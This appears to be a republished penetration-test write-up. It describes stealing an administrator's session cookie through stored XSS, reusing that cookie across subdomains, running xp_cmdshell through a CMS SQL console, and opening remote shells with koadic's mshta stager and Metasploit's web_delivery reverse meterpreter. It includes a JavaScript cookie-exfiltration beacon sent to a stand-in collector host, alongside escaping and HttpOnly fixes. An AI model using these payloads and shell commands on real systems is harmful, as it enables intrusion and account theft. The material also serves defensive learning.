Case Analysis of Server privilege Penetration Test

2025-01-17 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

In this article the editor walks through a "case analysis of a server-privilege penetration test" in detail. The content is thorough, the steps are laid out clearly and the details are handled properly; hopefully it helps clear up your doubts. Let's follow the editor's line of thought and learn something new.

XSS

When it comes to XSS, many testers just enter a simple payload and pop an alert box to prove it (I used to do the same). After this article, perhaps we will do more with an XSS than merely prove it exists with a pop-up.

Google syntax

Looking for a starting point

The standard approach to a penetration test is to gather information first, but in this engagement only getshell or other access to the server scored: ordinary XSS, CSRF and weak passwords did not count, and even getting into the admin backend without a shell counted for nothing.

In that situation I usually go looking for upload points. Using Google dorks (site: the target's subdomain, combined with intitle: registration / login / system) I look for anywhere I can register or log in.

After registering successfully I found an XSS vulnerability in the personal information page. The usual test is to pop an alert box to prove it, but I did not want to stop at proving it; I wanted to do something with the XSS.

Because there was an ID-card upload feature, I first tried to bypass the upload point, but after trying all the usual methods nothing worked, so I gave up on it and examined the site more carefully. I noticed that the personal information submitted here has to be reviewed by an administrator, and there was a stored XSS in exactly that field, so why not take a chance and go for the administrator's cookie?

So I inserted the XSS payload there, went out to eat, and waited for the results.

I had not expected luck to be on my side that day. While I was having dinner, a notification from the mailbox my XSS payload reported the administrator's cookie to popped up on my phone. I skipped the rest of dinner and went straight back to the computer to continue.
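The beacon planted in the profile field above works because the administrator's review page renders the submitted text as HTML and the session cookie is readable from script. The following is an added example, not code from the original write-up: the shape of such a stored-XSS beacon, the collector-side parsing of what the victim's browser sends back, and the vulnerable render routine beside its fixed form. The collector URL, field names and cookie values are made up for illustration.

```javascript
// Added example (not from the original write-up). The collector URL, profile
// field names and cookie values are assumptions used only for illustration.

// Attacker side: payload stored in the profile field. When the admin's browser
// renders the unescaped field, the broken <img> fires onerror, which sends
// document.cookie (only cookies set WITHOUT HttpOnly) and the current page
// URL to the collector.
function buildBeaconPayload(collectorUrl) {
  const js =
    `new Image().src='${collectorUrl}?c='+encodeURIComponent(document.cookie)` +
    `+'&u='+encodeURIComponent(location.href)`;
  return `<img src=x onerror="${js}">`;
}

// Collector side: recover the fields from the request the victim's browser made.
function parseBeacon(requestUrl) {
  const u = new URL(requestUrl);
  return { cookie: u.searchParams.get('c') || '', page: u.searchParams.get('u') || '' };
}

// Vulnerable admin review page: interpolates the submitted field verbatim into HTML.
function renderReviewVulnerable(profile) {
  return `<tr><td>${profile.name}</td><td>${profile.bio}</td></tr>`;
}

// Fix: contextual output encoding before insertion into an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderReviewSafe(profile) {
  return `<tr><td>${escapeHtml(profile.name)}</td><td>${escapeHtml(profile.bio)}</td></tr>`;
}

// Second layer: document.cookie never exposes a cookie set with HttpOnly, so a
// Set-Cookie header carrying that flag defeats this exfiltration even while the
// injection itself remains unfixed.
function cookieReadableByScript(setCookieHeader) {
  return !/;\s*httponly\b/i.test(setCookieHeader);
}

// Constructed sample profile (not real data).
const profile = { name: 'tester', bio: buildBeaconPayload('https://collector.example/x') };
console.log(renderReviewVulnerable(profile).includes('onerror=')); // true: payload is live HTML
console.log(renderReviewSafe(profile).includes('onerror='));       // false: rendered as text
```

The two renderers show the whole difference: the review page must treat the profile text as data, and the session cookie should additionally carry HttpOnly so that even a surviving XSS cannot read it.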

Blind XSS into the backend

With the cookie in hand, I swapped my own cookie for the administrator's using the EditThisCookie extension in Chrome and got into the backend as the administrator. But the page I landed on looked more like a static page: it only displayed some information and had no other functions:

That did not add up. If the administrator has to review my user information there must be a review interface somewhere, and that made me think of the browser's same-origin policy.

The browser's same-origin policy

Definition of same origin: two pages have the same origin only if their scheme (protocol), host and port are all identical.

Cookies, however, are not scoped by origin. A cookie's reach is set by its Domain attribute: a host-only cookie (no Domain attribute) is sent back only to the exact host that set it, while a cookie set with Domain=example.com is sent to example.com and every subdomain under it, so a session issued on one subdomain is also accepted by a sibling subdomain such as the admin console. (Setting document.domain to the common parent only relaxes the same-origin check for script access between two subdomains; it does not share cookies and is deprecated in current browsers.)

Sure enough, the stolen session cookie was valid beyond the page I had landed on: the administrator's own review interface accepted it as well, and that put us in the real administrator backend.
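The distinction that made the stolen cookie usable on the administrator's host is the one between the same-origin check and cookie domain matching. As an added example that is not part of the original write-up, the code below implements both checks and runs them over a constructed scenario (the host names, cookie name and value are made up); it generalises the case in the text by also showing the host-only cookie that would have stopped the reuse.

```javascript
// Added example (not from the original write-up). Host names, cookie names and
// values are constructed for illustration only.

// Same-origin check: scheme, host and port must all match. This governs script
// access between documents; it is NOT what decides where a cookie is sent.
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA), b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// RFC 6265 domain-matching: a cookie with Domain=example.com is sent to
// example.com and every subdomain of it. IP-literal hosts never domain-match.
function domainMatches(requestHost, cookieDomain) {
  const h = requestHost.toLowerCase();
  const d = cookieDomain.toLowerCase().replace(/^\./, '');
  if (h === d) return true;
  return h.endsWith('.' + d) && !/^\d+\.\d+\.\d+\.\d+$/.test(h);
}

// Minimal Set-Cookie parser: name, Domain (host-only if absent), HttpOnly, Secure.
function parseSetCookie(header, settingHost) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const cookie = { name: pair.split('=')[0], domain: null, httpOnly: false, secure: false };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    const key = k.toLowerCase();
    if (key === 'domain' && v) cookie.domain = v.replace(/^\./, '').toLowerCase();
    else if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
  }
  cookie.hostOnly = cookie.domain === null;
  if (cookie.hostOnly) cookie.domain = settingHost.toLowerCase();
  return cookie;
}

// Would the browser attach this cookie to a request for targetUrl?
function cookieSentTo(cookie, targetUrl) {
  const t = new URL(targetUrl);
  if (cookie.secure && t.protocol !== 'https:') return false;
  return cookie.hostOnly
    ? t.hostname === cookie.domain
    : domainMatches(t.hostname, cookie.domain);
}

// Constructed scenario: the session was issued on www, the review console lives
// on admin. The two are different origins, yet a Domain-scoped cookie is valid
// on both; a host-only cookie would not have been.
const broad = parseSetCookie('session=abc123; Path=/; Domain=example.com; Secure', 'www.example.com');
const hostOnly = parseSetCookie('session=abc123; Path=/; Secure; HttpOnly', 'www.example.com');
console.log(sameOrigin('https://www.example.com/', 'https://admin.example.com/')); // false
console.log(cookieSentTo(broad, 'https://admin.example.com/review'));             // true
console.log(cookieSentTo(hostOnly, 'https://admin.example.com/review'));          // false
```

For the defender the takeaway is the last two lines: scope session cookies to the issuing host (omit Domain) unless cross-subdomain sessions are genuinely required, and keep the admin console on its own session anyway.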

First thing to do in the backend: look for an upload point! Equally fruitless, so the only option was to look for other openings. Eventually I found a place in the content-management area where SQL statements can be executed.

With arbitrary SQL execution against what turned out to be SQL Server, the obvious next step is our old friend xp_cmdshell (disabled by default since SQL Server 2005; a sysadmin login can re-enable it through sp_configure). The command exec master..xp_cmdshell 'powershell whoami' ran successfully and showed that the SQL Server service account was SYSTEM, so anything we ran through it would run with SYSTEM privileges as well.

The next task was to bounce a shell back to our MSF, but the PowerShell reverse shell never connected back. Having come this far, giving up was not an option; after all, the goal was to get into their intranet and move laterally.

At that point I asked the boss at my company, who said to give koadic a try.

Using koadic

I noticed there had been no introduction to koadic in the community before, so a few words about it here.

Koadic is a post-exploitation toolkit first presented at DEF CON. It is similar to msf, but Koadic does most of its work through Windows Script Host (JScript/VBScript). Its core is compatible with everything from Windows 2000 through Windows 10, and Koadic also tries to support both Python 2 and Python 3.

Set the IP and port for koadic's local listener.

The one-liner koadic generated, mshta http://ip/XXXX, was executed through xp_cmdshell and the implant connected back to koadic.

Callback received:

cmdshell 0 enters a command shell on zombie 0 (the first implant).

Koadic can carry on from here as well (privilege escalation, credential dumping and so on), but we were not that familiar with its modules, so we fell back on the tool we know best, MSF. (Shout-out to MSF!)

Handing the shell from koadic to MSF

Now that we can run CMD commands through koadic, we just need to hand the shell over to msf.

Start MSF: msfconsole

Use the web_delivery module:

use exploit/multi/script/web_delivery

Set the payload:

set payload windows/x64/meterpreter/reverse_tcp_rc4

set SRVPORT 8081

set LHOST XX.XX.XX.XXX

LHOST is the public address the target connects back to, but my server's own network interface only has a private address (the same one koadic was already listening on, since koadic and MSF run on the same box), so the handler has to bind to that private address rather than to LHOST:

Check the private IP:

set ReverseListenerBindAddress 172.xx.xx.182

run

web_delivery then prints a powershell.exe one-liner.

Running that command from the koadic cmdshell hands the shell over to our MSF.

Session received.

Seeing the familiar meterpreter prompt again almost brought tears to my eyes!

Because the server was already running as SYSTEM there was no need for privilege escalation. But just as I was about to start moving laterally across the intranet hosts, I ran into a big problem: the machine was not domain-joined!

That concludes "Case Analysis of Server Permission Penetration Test". To really master the points in this article you still need to practise them yourself. For more articles like this, follow the industry information channel.


© 2024 shulou.com SLNews company. All rights reserved.
